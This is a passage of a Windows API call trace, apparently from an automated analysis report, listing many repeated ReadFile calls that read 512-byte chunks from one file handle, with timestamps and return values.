lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.101] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.102] ReadFile (in: hFile=0x54, 
lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.102] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.102] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.102] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.102] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.102] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.102] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.102] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.102] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.102] ReadFile 
(in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.103] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.103] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.103] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.103] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.103] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.103] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.103] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.103] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 
[0115.103] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.103] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.104] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.104] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.104] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.104] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.104] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.104] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.104] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, 
lpOverlapped=0x0) returned 1 [0115.104] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.104] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.104] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.105] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.105] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.105] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.105] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.105] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.105] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, 
lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.105] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.105] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.105] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.105] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.105] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.105] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.105] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.106] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.106] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: 
lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.106] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.106] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.106] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.106] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.106] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.106] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.106] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.106] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.106] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, 
lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.106] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.107] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.107] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.107] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.107] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.107] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.107] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.107] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.107] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.107] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.107] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.107] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.107] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.107] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.107] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.108] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.108] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.108] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.206] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.206] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.206] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.207] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.207] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.207] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.207] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.207] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.207] ReadFile (in: hFile=0x54, 
lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.207] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.207] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.207] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.207] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.208] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.208] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.208] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.208] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.208] ReadFile 
(in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.208] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.208] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.208] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.208] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.209] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.209] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.209] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.209] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 
